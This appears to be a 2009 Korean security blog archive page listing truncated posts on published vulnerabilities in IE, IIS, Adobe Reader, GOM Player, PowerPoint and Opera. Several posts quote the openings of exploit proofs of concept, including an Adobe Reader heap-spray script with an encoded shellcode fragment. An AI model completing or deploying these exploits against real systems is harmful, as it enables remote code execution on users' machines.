[IE7,8]Multiple Exploiting IE8/IE7 XSS Vulnerability 어제 IE7과 IE8 XSS에 대한 취약점이 발표되었다. 실제 악의적으로 사용한 흔적은 아직까지는 없는듯 하다. 조만간에 나오겠군 ㅡ.ㅡ; - Exploit Code Multiple Exploiting IE8/IE7 XSS Vulnerability Author: www.80vul.com [Email:5up3rh3i#gmail.com] Release Date: 2009/06/22 References: http://www.80vul.com/ie8/Multiple%20Exploiting%20IE8IE7%20XSS%20Vulnerabili ty.txt Overview: Tags[not include ] in ie7/8 are don't allowe to run "javascript:[jscodz]",but we.. 2009. 6. 23. Microsoft IIS Unicode Requests to WebDAV Multiple Authentication Bypass Vulnerabilities 원문보기 : http://www.securityfocus.com/bid/34993 Microsoft Internet Information Service (IIS) is prone to multiple authentication-bypass vulnerabilities because the application fails to properly enforce access restrictions on certain requests to password-protected WebDAV folders. An attacker can exploit these issues to gain unauthorized access to protected WebDAV resources, which may lead to other .. 2009. 5. 19. [AdobeReader]Adobe Reader 8.1.4/9.1 customDictionaryOpen() Code Execution Exploit GetAnnots() 취약점과 같이 발표 된 customDictionaryOpen()의 POC //############## //Exploit made by Arr1val //Proved in adobe 9.1 and adobe 8.1.4 on linux //############## var memory; function New_Script() { var nop = unescape("%u9090%u9090"); var shellcode = unescape("%uc92b%ue983%ud9ee%ud9ee%u2474%u5bf4%u7381%uc513%u4871%u83a5%ufceb%uf4e2%uaaf4%ue61b %u1b96%ucf4a%u29a3%u44c1%uf108%ufcdb%u4e75%u2585%u088c%.. 2009. 4. 30. [AdobeReader]Adobe Reader 8.1.4/9.1 GetAnnots() Remote Code Execution Exploit 몇일 전 취약점이 공개되었던 AdobeReader에 대한 POC가 공개되었다. 이제 또 한차례 폭풍이 불어오나? ㅋ //############## //Exploit made by Arr1val //Proved in adobe 9.1 and adobe 8.1.4 on linux // //Steps: //- create a pdf with an annotation (a note) (i used an annotation with a very long AAAAA name, but that might be omitted) //- attach the following script to the OpenAction of the pdf. //############## var memory; function New_Scri.. 2009. 4. 30. [AdobeReader]Adobe Reader (getAnnots() 등)취약점으로 인한 피해 주의 □ 개요 o Adobe Reader에서 getAnnots() / customDictionaryOpen() 처리 시 발생하는 메모리 손상 에러로 원격코드 실행이 가능한 신규 취약점이 발표되어 사용자의 주의를 요함[1, 2, 3, 4] o Adobe Reader 사용자는 메일/메신저로 전송된 출처가 불분명한 PDF 파일을 열람하지 않도록 주의하여야 함 □ 영향 받는 시스템 o Adobe Reader / Acrobat 9.1 이하 버전 o Adobe Reader / Acroba 8.1.4 이하 버전 o Adobe Reader / Acroba 7.1.1 이하 버전 ※ 모든 플랫폼(윈도우, 매킨토시, Unix/Linux) 상의 모든 제품 버전에 해당함 □ 설명 o 악의적으로 작성된 PDF 문서를 열어볼 경우 피해.. 2009. 4. 29. [Gom]GOM Player Subtitle Buffer Overflow Vulnerabiltity 곰플레이어 취약점 발생 3월 18일에 나오고 난 후 한달만에 다른 취약점이 발견되었다. 전 세계 많은 사람들이 곰플레이어를 사용한다는 것이 자랑스럽다 ㅎㅎ - http://security.bkis.vn/?p=501 #!/usr/local/bin/perl ################################################################## # # Title : GOM Player Subtitle Buffer Overflow Vulnerabiltity # Discovery by : Bui Quang Minh # Tested : GOM Player 2.1.16.6134 # Reference : Bkis [http://security.bkis.vn/?p=501] # PoC : .. 2009. 4. 9. [PowerPoint]Microsoft PowerPoint File Parsing Remote Code Execution Vulnerability 오피스 파워포인트 2007이하는 모두 취약점이 있는 것으로 확인되었다. 제길 ㅠㅠ 난 2003인데 ;;;;; Bugtraq ID: 34351 Class: Boundary Condition Error CVE: CVE-2009-0556 Remote: Yes Local: No Published: Apr 02 2009 12:00AM Updated: Apr 02 2009 12:00AM Credit: Microsoft Vulnerable: Microsoft PowerPoint 2004 for Mac 0 Microsoft PowerPoint 2003 SP3 + Microsoft Office 2003 SP3 Microsoft PowerPoint 2003 SP2 + Microsoft Office 2003 SP2 Micr.. 2009. 4. 3. [Opera]Opera 9.64 (7400 nested elements) XML Parsing Remote Crash Exploit # # Author : Ahmed Obied (ahmed.obied@gmail.com) # # - Similar to the bug found by Wojciech Pawlikowski for Firefox # -> http://www.milw0rm.com/exploits/8306 # # - Tested using the latest version of Opera (9.64) # # Usage : python opera.py [port] # import sys, socket from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler class RequestHandler(BaseHTTPRequestHandler): def get_exploit(self):.. 2009. 3. 31. 이전 1 ··· 8 9 10 11 12 다음
